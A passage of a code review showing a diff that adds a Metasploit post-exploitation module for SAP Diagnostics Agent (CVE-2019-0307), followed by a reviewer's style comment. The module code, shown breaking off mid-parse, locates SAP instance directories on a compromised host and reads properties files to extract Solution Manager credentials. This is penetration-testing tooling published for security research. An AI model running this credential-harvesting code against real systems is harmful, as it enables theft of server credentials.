modules/post/multi/sap/smdagent_get_properties.rb

```diff
@@ -0,0 +1,291 @@
+        info,
+        'Name' => 'Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server',
+        'Description' => %q{
+          If a SMDAgent has CVE-2019-0307 vulnerability, attackers can obtain its secstore.properties configuration file,
+          which contains the credentials for the SAP Solution Manager server to which this SMDAgent is connected.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
+          'Vladimir Ivanov' # @_generic_human_ This Metasploit module
+        ],
+        'Platform' => %w[bsd linux osx unix win],
+        'SessionTypes' => %w[meterpreter shell],
+        'References' => [
+          [ 'CVE', '2019-0307' ],
+          [ 'URL', 'https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf' ]
+        ]
+      )
+    )
+  end
+
+  def run
+    case session.type
+    when 'meterpreter'
+      meterpreter = true
+    else
+      meterpreter = false
+    end
+    case session.platform
+    when 'windows'
+      windows = true
+      instances = list_dir(WIN_PREFIX, windows, meterpreter)
+    else
+      windows = false
+      instances = list_dir(UNIX_PREFIX, windows, meterpreter)
+    end
+
+    if (instances == '') || instances.nil? || instances.empty?
+      fail_with(Failure::NotFound, 'SAP root directory not found')
+    end
+
+    instances.each do |instance|
+      next if instance == 'SYS'
+
+      next if instance.include? ' '
+
+      next if instance.include? '.'
+
+      next if instance.include? 'tmp'
+
+      if windows
+        runtime_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{RUNTIME_FILE}"
+        secstore_properties_file_name = "#{WIN_PREFIX}#{instance}#{WIN_SUFFIX}#{SECSTORE_FILE}"
+      else
+        runtime_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{RUNTIME_FILE}"
+        secstore_properties_file_name = "#{UNIX_PREFIX}#{instance}#{UNIX_SUFFIX}#{SECSTORE_FILE}"
+      end
+
+      runtime_properties = parse_properties_file(runtime_properties_file_name, windows, meterpreter)
+      secstore_properties = parse_properties_file(secstore_properties_file_name, windows, meterpreter)
+
+      next if runtime_properties.empty?
+
+      print_line
+      print_status("Instance: #{instance}")
+      print_status("Runtime properties file name: #{runtime_properties_file_name}")
+      print_status("Secstore properties file name: #{secstore_properties_file_name}")
+
+      sld_protocol = nil
+      sld_hostname = nil
+      sld_address = nil
+      sld_port = nil
+      sld_username = nil
+      sld_password = nil
+
+      smd_url = nil
+      smd_username = nil
+      smd_password = nil
+
+      # Parse runtime.properties file
+      runtime_properties.each do |property|
+        if property[:name] =~ /sld\./
```

Comment:
It is recommended to avoid using regex when it is not necessary. In this case, `include?` is preferred since it is a simple string comparison and is faster than a regex:
```suggestion
        if property[:name].include?('sld.')
```